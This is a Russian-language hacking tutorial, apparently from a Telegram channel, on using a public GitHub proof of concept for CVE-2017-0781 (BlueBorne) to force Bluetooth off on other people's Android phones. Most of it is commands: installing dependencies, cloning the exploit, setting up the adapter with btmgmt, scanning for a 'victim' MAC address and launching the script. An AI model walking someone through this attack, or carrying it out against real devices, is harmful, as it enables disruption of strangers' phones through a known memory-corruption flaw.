Как отключить Bluetooth на чужом девайсе.
https://t.me/CyberLifes
Доброго времени суток. Сегодня хотел бы рассказать вам об уязвимости, которая известно давно...Просто о ней на время забыли, т.к. не выкладывали exploit...И вот на днях совершилось чудо! На гитхабе выложили скрипт python-а с использованием уязвимости(CVE-2017-0781/ Blueborn).
Суть exploit-а в том, что бы вызвать принуждённое отключение bluetooth на устройстве "жертвы". Грубо говоря, exploit бьёт по уязвимым местам прошивки android( как пишут некоторые люди, ios тоже через раз получается) и вызывает ошибку типа null-byte(переполнение буфера).
UPD: Было лично протестировано на своём телефоне - MEIZU M5 NOTE с обновлённым Flyme OS.
Приступим!
>Первым делом нам нужно установить зависимости скрипта.
[SRC]
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
[/SRC]
Затем обновляем модули python.
[SRC]
pip install —upgrade pip
pip install —upgrade pwntools
[/SRC]
Для работы с bluetooth с помощью python нам понадобится модуль pybluez.
[SRC]
apt-get install bluetooth libbluetooth-dev
pip install pybluez
[/SRC]
>Затем приступаем к скачиванию эксплоита(корректней будет назвать скриптом).
[SRC]
git clone https://github.com/ojasookert/CVE-2017-0781
>Дальше нам придётся попотеть...Т.к. проблема может быть следующая:
Не работает bluetooth....Для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
btmgmt —index 0
power
auto-power
find
Если начнется мониторинг Bluetooth устройств - значит всё готово.
>Используем скрипт. Для этого нам нужен MAC-адресс bluetooth устройства(используем команду btmgmt —index 0 и find).
Как только нашли "жертву", вводим команду.
[SRC]
python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.*
[/SRC]
И ждём. Мониторить устройство можете с других или же через консоль.